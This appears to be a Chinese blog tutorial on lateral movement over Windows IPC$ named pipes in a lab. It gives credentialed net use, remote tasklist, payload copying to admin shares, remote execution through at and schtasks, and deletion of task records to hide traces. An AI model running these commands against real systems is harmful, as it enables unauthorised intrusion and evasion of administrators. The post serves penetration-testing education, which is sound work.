IPC命名管道攻击

于 2021-06-18 17:21:57 发布
阅读量652 收藏 3
点赞数
分类专栏: 横向移动 文章标签: 渗透测试 网络安全 横向移动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/117817006
版权

IPC命名管道攻击

介绍

域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是高级持续威胁(APT)攻击中。攻击者会利用该技术,以攻陷的系统为跳板,访问其他域内主机,扩大资产范围,其中也包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产。

通过这种手段,攻击者最终可能获取域控的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。

前言

在渗透测试中,拿到目标计算机的用户明文密码或者NTLM Hash后,可以通过Pass The Hash的方法,将散列值或明文密码传送到目标机器中进行验证。与目标机器建立连接后,可以使用远程命令对Windows主机进行相关操作。在实际网络环境中,网络管理人员可以通过配置Windows系统自带的防火墙或组策略进行防御。

IPC

IPC共享"命名管道"的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。

通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标计算机机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

ipc$的利用条件

  1. 开启了139、445端口。ipc$可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。
  2. 管理员开启了默认共享。默认共享是为了方便管理员进行远程管理而默认开启的,包括c$、d$、e$等和系统目录winnt或admin$。

ipc$连接失败的原因

  • 用户名或密码错误
  • 目标没有打开ipc$默认共享
  • 不能成功连接目标的139、445端口
  • 命令输入错误

常见错误号

  • 5:拒绝访问
  • 51:Windows无法找到网络路径,即网络中存在问题
  • 53:找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动、目标有防火墙,端口被过滤。
  • 67:找不到网络名,包括lanmanworkstation服务未启动、ipc$已被删除
  • 1219:提供的凭据与已存在的凭据集冲突。
  • 1326:位置的用户名或错误的密码。
  • 1792:试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动
  • 2242:此用户的密码已经过期

获取远程主机信息

首先我们得先建立命名管道

net use \\要建立连接的IP地址\ipc$ "账户密码" /user:对应用户名
net use

在这里插入图片描述
查看对应磁盘的信息

dir \\192.168.108.101\c$

在这里插入图片描述
使用tasklist命令的/S、/U、/P参数列出远程主机上运行的进程

tasklist /S 192.168.108.101 /U administrator /P Admin12345

在这里插入图片描述

计划任务

at是Windows自带的用于创建计划任务的命令,它主要工作在Windows Server2008之前版本中,创建计划任务的流程大致如下:

  1. 使用net time命令确定远程机器当前的系统时间
  2. 使用copy命令将payload文件复制到远程目标机器中
  3. 使用at命令定时启动该payload文件
  4. 删除使用at命令创建计划任务的记录
  5. tips:因为域用户受到权限的限制,要执行相关操作必须是本地管理员才可以

在这里插入图片描述

查看目标系统时间

在这里插入图片描述

将文件复制到目标系统中

copy calc.bat \\192.168.108.103\C$

在这里插入图片描述

使用at创建计划任务

获取系统的当前时间的目的就是让目标系统在指定时间运行一个程序

at \\192.168.108.103 16:11 C:\calc.bat

在这里插入图片描述
可以看到在指定的时间后台开启了计算器这个进程
在这里插入图片描述

清除at记录

计划任务不会删除自己本身,因此网络管理员可以通过攻击者创建的计划任务判断自己是否遭到了攻击

at \\192.168.108.103 1 /delete

在这里插入图片描述
我们使用at远程执行命令后,可以将结果写入本地文本文件中,再使用type命令读取该文本内容

at \\192.168.108.103 16:20 cmd.exe /c "ipconfig >C:/1.txt"

在这里插入图片描述
在这里插入图片描述
at命令在Windows2008之后就被废除,改用为schtasks这个命令,这命令更加灵活,我们来看看它的使用方法

我们现在在远程主机上创建一个名称为test的计划任务,设置为开机启动,启动C盘的calc.bat文件,权限为Administrator。意外发现建立了ipc后还是要输入用户名和密码,要不然会提示拒绝访问

schtasks /create /s 192.168.108.101 /tn test /sc onstart /tr c:\calc.bat /u administrator /p aDmin12345 /f

在这里插入图片描述
执行计划任务

schtasks /run /s 192.168.108.101 /i /tn "test" /u administrator /p aDmin12345

在这里插入图片描述
在这里插入图片描述

最后我们删除这个计划任务

schtasks /delete /s 192.168.108.101 /tn "test" /f /u administrator /p aDmin12345

在这里插入图片描述
最后我们删除这个ipc命名管道,在删除时要确认是自己创建的命名管道

net use \\192.168.108.101\ipc$ /del /y
平凡的学者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ipc$攻击
weixin_45647970的博客
06-27 2606
ipc$攻击使用条件: 1.开放了139、445端口 2.目标开启ipc$共享 3.获取用户账号密码 向默认共享复制失败原因: 1.对方没开启默认共享,能建立ipc连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c连接的主机不一定开启了默认共享,因而在建立完连接之后马上向c,d,admin,admin,admin之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。ipc连接成功只能说明对方打开了ipc连接成功只能说明对方打开了
网络安全攻防之IPC$攻击
Ice_15的成长
04-06 3043
IPC$空会话攻击 原创文章,是我的实验作业,将我做这个实验的过程记录下来,路途遥远,现在启程!        我的实验环境是两台虚拟机,分别是windows xp sp3和windows xp sp2 。windows xp sp3作为主机,windows xp sp2作为靶机:      1.首先在靶机端运行cmd,输入命令net share查看当前系统中的硬盘是否处于共享状
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1127
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
ipc命名管道
碧海晴天
04-22 970
本帖最后由 R.E.C--F22 于 2010-1-18 12:19 编辑 C是共享“命名管道”的资源,它对于<span class="t_tag" onclick="function onclick(){function onclick(){tagshow(event)}}">程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以
ipc$空口令攻击
heminzhang的专栏
04-11 4164
疑难解答:1 windows xp环境下的ipc$攻击是不允许连接没有密码的主机的,因此实验室需要先修改B的组策略,当然更简单的方法为给B的管理员账户添加密码。                   2 在已经设置好密码和用户名之后,连接windowx xp的ipc$时会提示1326错误,提示,用户名或者密码错误。但检查之后会发现输入正确。根本原因在于,windows主机使用了简单的文件共享,解决
IPC是共享“命名管道”资源
03-12
IPC(Internet Process Connection)是Windows操作系统中的一种进程间通信机制,主要通过“命名管道”来实现。命名管道是一种可靠的、半双工的通信方式,允许两个进程之间进行数据交换,尤其在远程管理和查看计算机...
IPC共享通道命令
03-19
IPC$ 是共享命名管道的资源,为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限。在远程管理计算机和查看计算机的共享资源时使用。利用 IPC$, 连接者甚至可以与目标主机建立一个空的连接而...
红尘网安Ipc$【135】全自动扫描【网吧内网专用版】
12-25
"Ipc$"通常指的是IPC$共享,这是一种Windows系统中的命名管道通信机制,常常被黑客用于远程访问和控制。而“135端口”是RPC(Remote Procedure Call)服务使用的端口,也是许多恶意软件和攻击者的目标,因为它们可以...
BadPotato:Windows权限提升BadPotato
03-19
4. **命名管道(Named Pipe)**:在Windows操作系统中,命名管道是一种进程间通信(IPC)机制,允许不同进程间传递数据。BadPotato利用了这一机制的漏洞,创建特定的管道名来触发权限提升。 5. **C#编程语言**:...
模拟聊天室
07-01
在计算机科学领域,进程间的通信(IPC,Inter-Process Communication)是多线程、多进程编程中的重要一环,而命名管道作为IPC的一种方式,因其简单高效而在Windows操作系统中广泛应用。 命名管道的工作原理类似于...
(实验经验分享)网络攻击与对抗 > 实验六:IPC$管道的利用与远程控制
F4ckM3的专栏
08-18 3879
实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络实验时数(学分):2学时实验类别:实践实验类 实验目的   1.了解IPC$漏洞原理;   2.掌握IPC$漏洞攻击方法;   3.掌握psExec工具的使用;   4.掌握远程控制工具radmin的使用。 预备知识 本实验要求实验者具备如下的相关知识。     
IPC$入侵完全指令
热门推荐
yutel的专栏
06-25 1万+
一   相关命令  1)建立空连接:  net use \\IP\ipc$ "" /user:""         (一定要注意:这一行命令中包含了3个空格)  2)建立非空连接:  net use \\IP\ipc$ "用户名" /user:"密码"      (同样有3个空格)  3)映射默认共享:  net use z: \\IP\c$ "密码" /user:"用户名"    
ipc$入侵
11-17 182
而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。  我们只需要在isql窗口中输入:use mastersp_dropextended...
IPC$入侵
weixin_30377461的博客
09-19 755
一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管...
详细了解IPC$命令, 防止IPC$入侵、攻击
言出必行
09-08 3611
IPC$命令详解  一 摘要  二 什么是ipc$  三 什么是空会话  四 空会话可以做什么  五 ipc$所使用的端口  六 ipc管道在hack攻击中的意义  七 ipc$连接失败的常见原因  八 复制文件失败的原因  九 关于at命令和xp对ipc$的限制  十 如何打开目标的IPC$共享以及其他共享  十一 一些需要shell才能完成的命令  十二 入侵中可能会用到的命令  十三 对比过
ipc$+telnet远程攻击
sinat_27680751的博客
11-20 971
1.ipc$连接的条件 条件:(1)对方机器开了ipc$共享 (2)需要对方机器开启139和445端口支持 (3)系统只有nt/2000/xp才可以相互建立ipc$连接 (4)需要知道对方机器的ip (5)双方都需要启动了Lanmanworkstation服务 Ipc$在操作时系统日志会留下操作记录   2.ipc$空链接 命令:net use \\ip地址\ipc$"" /us
IPC - 命名管道(fifo)- 使用
YY_Song 's blogs
06-15 473
命名管道-FIFO命名管道函数原型注意事项FIFO出错信息简单应用参考资料 命名管道 我们前面介绍了匿名管道(pipe),匿名管道实际上就是:内存上的一块缓存。 它的主要实现方式是借助于fork之后父进程和子进程会共享之前已经打开的文件描述符,并且父进程关闭fd[0]读端,子进程关闭fd[1]写端来实现的。 之所以说它是匿名管道,是因为,它在内核中开辟的缓存并没有一个名字。 那么,通过名字就能理解了,命名管道就是在内核中开辟的缓存有自己的名字了。 其实,这也就是命名管道和匿名管道之间的区别。 命名管道的本质
入口点
cogbee的专栏
07-09 1168
入口点是应用程序能够接受输入的地方,对于攻击者来说,入口点是尝试突破的最佳位置。因此搞清楚有哪些入口点,入口点的安全级别等是非常有必要的。 常见入口点: 1、文件 文件包含用户指定的数据,或程序提交的数据。很多文件可能会以xml这种中间格式存储,或者让用户可以选择文件上传等等。我们常常只是关注了文件的内容,忽略了与这个文件相关的其他数据,比如权限等。 攻击者比较感兴趣的是: 文件包含敏感
dart windows 命名管道ipc通信 demo
最新发布
02-07
Dart语言中可以使用`dart:io`库中的`RawSocket`类来实现Windows命名管道IPC通信。 实现步骤如下: 1. 创建一个命名管道,使用`RawSocket.bind`方法,并传入管道名称。 2. 监听管道连接事件,使用`RawSocket.listen`方法,并传入监听回调函数。 3. 在回调函数中处理接收到的数据,使用`RawSocket.read`方法读取数据。 4. 使用`RawSocket.write`方法向管道写入数据。 示例代码如下: ```dart import 'dart:io'; void main() async { var server = await RawSocket.bind('\\\\.\\pipe\\mypipe'); server.listen((event) { switch (event) { case RawSocketEvent.read: var buffer = server.read(); var data = String.fromCharCodes(buffer); print('Received: $data'); break; case RawSocketEvent.closed: print('Closed'); break; } }); server.write('Hello, client!'); } ``` 客户端代码如下: ```dart import 'dart:io'; void main() async { var client = await RawSocket.connect('\\\\.\\pipe\\mypipe'); client.write('Hello, server!'); client.listen((event) { switch (event) { case RawSocketEvent.read: var buffer = client.read(); var data = String.fromCharCodes(buffer); print('Received: $data'); break; case RawSocketEvent.closed: print('Closed'); break; } }); } ``` 以上为简单的示例代码,实际使用中可能需要进行更多的错误处理和设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值